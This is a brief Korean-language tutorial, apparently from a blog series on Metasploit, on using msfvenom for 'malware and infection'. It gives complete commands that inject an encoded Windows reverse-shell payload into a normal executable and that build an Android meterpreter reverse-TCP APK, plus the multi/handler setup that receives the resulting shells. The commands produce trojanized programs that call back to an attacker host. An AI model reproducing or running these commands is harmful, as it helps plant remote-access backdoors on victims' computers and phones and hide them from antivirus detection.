[MAD-METASPLOIT] 0x22 - Malware and Infection
c
msfvenom?
Metasploit framework 중 일부이며 payload가 담긴 파일(exe, apk, dll 등 여러가지) 생성 및 주입에 사용됩니다. 간단한 명령행으로 편하게 사용할 수 있으니 알아두시면 좋습니다. 주요 옵션군을 정리하면 아래와 같습니다.
-x : 감염시킬 프로그램 -p : 삽입할 Payload -e : 인코딩 -f : 포맷
msfvenom을 이용한 Application Infection
#> msfvenom -x nomal_app.exe -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -k -f exe -i 25 LHOST=xxx.xxx.xxx.xxx LPORT=4444 > output.exe
msfvenom을 이용한 Android APK Infection
#> msfvenom -p android/meterpreter/reverse_tcp LHOST=... LPORT=4444 R > test_shell.apk
Handler를 통한 Shell 연결
HAHWUL > use exploit/multi/handler
Application HAHWUL > windows/shell/reverse_tcp
Android APK HAHWUL > android/meterpreter/reverse_tcp
Reference
http://www.hahwul.com/2015/06/msfvenom-application-exploit-code.html http://www.hahwul.com/2015/08/metasploit-msfvenom-android-meterpreter.html